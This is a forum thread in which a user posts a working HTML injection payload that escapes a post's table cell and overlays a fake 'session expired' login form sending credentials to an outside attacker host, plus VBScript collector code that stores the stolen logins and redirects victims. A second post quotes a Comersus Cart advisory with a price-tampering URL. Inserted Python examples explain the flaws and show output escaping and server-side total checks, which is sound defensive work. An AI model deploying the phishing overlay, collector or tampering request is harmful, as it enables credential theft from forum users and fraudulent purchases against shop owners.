qcred11
QUOTE


I'm releasing it very quickly ... so it can be improved:

Code to put in a reply or in a topic:

<!-- Part 1: close the forum's own post cell and mimic the post footer (Profile / www / Quote links), so everything after it lands outside the post -->
Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1" class="ONGL">&nbsp;&nbsp;Profile&nbsp;&nbsp;www&nbsp;&nbsp;Quote

&nbsp;&nbsp;
</td></tr></table></TD></TR>

<!-- Part 2: absolutely positioned overlay carrying a fake "session expired" login form that POSTs the credentials to the attacker's server (CSS uses "property: value", not "property=value") -->
<div style="position: absolute; left: 0; top: 0; height: 3200px; width: 150px"><form action="http://mon-site-de-roxor.com/roxor.asp" method="post" name="piquage" target="_self"><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td colspan="2"><div align="center">Your session has expired. Please log in to reply.</div></td></tr><tr><td>&nbsp;</td></tr><tr><td><div align="right">Login :</div> </td> <td><input name="login" type="text" value=""> </td></tr><tr><td><div align="right">Password :</div> </td><td><input name="password" type="password" value=""> </td></tr><tr><td>&nbsp;</td></tr><tr><td colspan="2"><div align="center"><input type="submit" name="Submit" value="Send"></div></td></tr></table></form></div>

Example code (VBScript) for the page that the form in the topic posts to:

<%@ Language=VBScript %>
<%
' Collector page: store the credentials submitted by the fake login form,
' then bounce the victim back to the forum they came from.
set base = server.createobject("ADODB.CONNECTION")
' nom_base, login_base, password_base: your DSN or connection string, DB user and DB password
base.open nom_base, login_base, password_base

' Scheme and host of the referring forum, e.g. http://forum.example
' (left() up to the first "/" after the "http://" prefix)
referant = left(request.servervariables("HTTP_REFERER"), instr(8, request.servervariables("HTTP_REFERER"), "/") - 1)

' The form uses method="post", so the fields arrive in Request.Form
' (Request.QueryString would be empty here)
login = Request.Form("login")
password = Request.Form("password")

requete_vol_infos = "INSERT statistiques (date,npds,login,password) VALUES (getdate(),'" & cstr(referant) & "','" & cstr(login) & "','" & cstr(password) & "')"

set resultat_vol_infos = server.CreateObject("ADODB.RECORDSET")
resultat_vol_infos.Open requete_vol_infos, base

' Redirect to the forum so the "session expired" story holds up
response.redirect(referant)
%>

Thanks to N-0-X and NewFFR :o)

Rituel
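As an added example (not the poster's code), the following Python shows why the payload above works and what stops it: a miniature forum page that echoes a post body raw into a table cell lets the stray `</td></tr></table>` close the forum's own layout and float an off-site login form over the page, while HTML-escaping the body before insertion keeps the markup intact. The template, the trimmed payload, the forum hostname `forum.example` and the audit helper are assumptions made for illustration.

```python
"""Why the overlay payload works and how output encoding stops it.
Added example, not the poster's code: the miniature forum template, the
trimmed payload and the structure/form audit are assumptions for illustration."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed stand-in for the forum page: the post body is echoed raw into a
# table cell, which is exactly what the payload's leading </td></tr></table> relies on.
TEMPLATE = '<table><tr><td class="post">{body}</td></tr></table>'

# Trimmed version of the posted payload: break out of the cell, then float a
# fake "session expired" login form over the page that posts off-site.
PAYLOAD = (
    'Your fake message</td></tr></table></TD></TR>'
    '<div style="position: absolute; left: 0; top: 0; height: 3200px; width: 150px">'
    '<form action="http://mon-site-de-roxor.com/roxor.asp" method="post" name="piquage">'
    'Your session has expired. Please log in to reply.'
    'Login: <input name="login" type="text">'
    'Password: <input name="password" type="password">'
    '<input type="submit" value="Send"></form></div>')


class PostAudit(HTMLParser):
    """Track table/tr/td nesting and collect every form action on the page."""

    def __init__(self):
        super().__init__()
        self.open = []            # stack of currently open table, tr, td tags
        self.structure_broken = False
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.form_actions.append(dict(attrs).get("action") or "")
        elif tag in ("table", "tr", "td"):
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in ("table", "tr", "td"):
            # A close tag that does not match the innermost open tag means the
            # body escaped its cell (HTMLParser lower-cases </TD> for us).
            if self.open and self.open[-1] == tag:
                self.open.pop()
            else:
                self.structure_broken = True


def render(body, escape=True):
    """Vulnerable rendering when escape=False; hardened rendering otherwise."""
    return TEMPLATE.format(body=html.escape(body, quote=True) if escape else body)


def audit(document, own_host="forum.example"):
    """Return (structure_broken, off-site form actions) for a rendered page.
    own_host is the forum's own hostname (assumption for the example)."""
    p = PostAudit()
    p.feed(document)
    p.close()
    offsite = [a for a in p.form_actions
               if urlsplit(a).hostname not in (None, own_host)]
    return p.structure_broken or bool(p.open), offsite


if __name__ == "__main__":
    print(audit(render(PAYLOAD, escape=False)))   # (True, ['http://mon-site-de-roxor.com/roxor.asp'])
    print(audit(render(PAYLOAD)))                 # (False, [])
```

The same `audit()` pass can be run over already-stored posts to find bodies that close the forum's layout or carry a form posting to another host, which is what this payload looks like from the defender's side.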

qcred11
Here is another one:

QUOTE


Comersus Cart Improper Request Handling


Release Date:
July 6, 2004

Severity:
Medium

Vendor:
Comersus Open Technologies

Software:
Tested on Comersus Cart 5.09
Previous versions may also be affected.

Remote:
Remotely executed from any web browser

Technical Details:
The unethical user is able to modify the parameters to change the pricing before the order is processed through PayPal. This would allow the unethical user to place a fraudulent transaction which many times isn't caught until the product is already shipped OR the shopping cart owner is charged a chargeback fee when refunding the order.

Example:

http://[VICTIM]/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A

Vendor Fix:
Update to 5.098
http://www.comersus.com/
Use <form method="POST"> on all forms
Also recommend using SSL for ALL Transactional areas of the website.
Review all orders before processing

Credit:
Discovered By: Thomas Ryan
Provide Security
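Server-side recomputation of the order total, as an added example that is not part of the advisory or of Comersus' own code. It reassembles the advisory's request (with the constructed hostname `shop.example` in place of `[VICTIM]`), treats the client-supplied `orderDetails` as a claim to be checked against a constructed server-side order record, ignores `OrderTotal` entirely, and refuses the PayPal handoff when the figures disagree. The order store, the unit prices in it and the parsing of the `$amount` at the end of each `orderDetails` line are assumptions.

```python
"""Hardened PayPal handoff: the amount sent to the gateway comes from the shop's
own order record, and client-supplied figures are only checked against it.
Added example; SERVER_ORDERS, its unit prices and the orderDetails parsing are
assumptions, not Comersus' schema or code."""
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs, urlsplit

# Constructed order store: what the shop recorded when the cart was built.
# Assumed unit prices, chosen so the advisory's line totals are consistent.
SERVER_ORDERS = {
    "2002": [("RDHT/11", 1, Decimal("79.00")),
             ("WME/1", 2, Decimal("199.00")),
             ("BPRES2/6", 1, Decimal("14.39"))],
}

# The advisory's request, reassembled onto one line; shop.example stands in for [VICTIM].
ADVISORY_URL = (
    "http://shop.example/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002"
    "&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan"
    "&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A"
    "2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A"
    "1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A")

# Constructed tampered variant: every line total lowered to $1.00 before the handoff.
TAMPERED_URL = (ADVISORY_URL.replace("%2479%2E00", "%241%2E00")
                            .replace("%24398%2E00", "%241%2E00")
                            .replace("%2414%2E39", "%241%2E00"))


def server_total(id_order):
    """Authoritative total: quantities and unit prices from the shop's own record."""
    lines = SERVER_ORDERS.get(id_order)
    if lines is None:
        return None
    return sum((qty * unit for _, qty, unit in lines), Decimal("0"))


def claimed_total(order_details):
    """Sum the '$amount' ending each 'Nx #SKU ... = $amount' line the client sent.
    This is the client's claim, never the figure charged."""
    total = Decimal("0")
    for line in order_details.splitlines():
        if "$" not in line:
            continue
        try:
            total += Decimal(line.rsplit("$", 1)[1].strip())
        except InvalidOperation:
            raise ValueError("malformed orderDetails line: %r" % line)
    return total


def gateway_handoff(url):
    """Decide what the redirect to PayPal may carry.

    OrderTotal is ignored outright; orderDetails is compared against the server
    record and any disagreement aborts the handoff instead of being forwarded."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    id_order = params.get("idOrder", [""])[0]
    authoritative = server_total(id_order)
    if authoritative is None:
        return {"ok": False, "reason": "unknown idOrder %r" % id_order}
    claimed = claimed_total(params.get("orderDetails", [""])[0])
    if claimed != authoritative:
        return {"ok": False,
                "reason": "client claims %s, order %s totals %s"
                          % (claimed, id_order, authoritative)}
    return {"ok": True, "amount": authoritative}


if __name__ == "__main__":
    print(gateway_handoff(ADVISORY_URL))   # accepted, amount 491.39
    print(gateway_handoff(TAMPERED_URL))   # rejected: client claims 3.00
```

The design point is that the gateway page never needs the client's prices at all: once `idOrder` is known, everything PayPal is told comes from the server record, and the comparison exists only to log and block attempts like the one in the advisory.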

Invision Power Board © 2001-2005 Invision Power Services, Inc.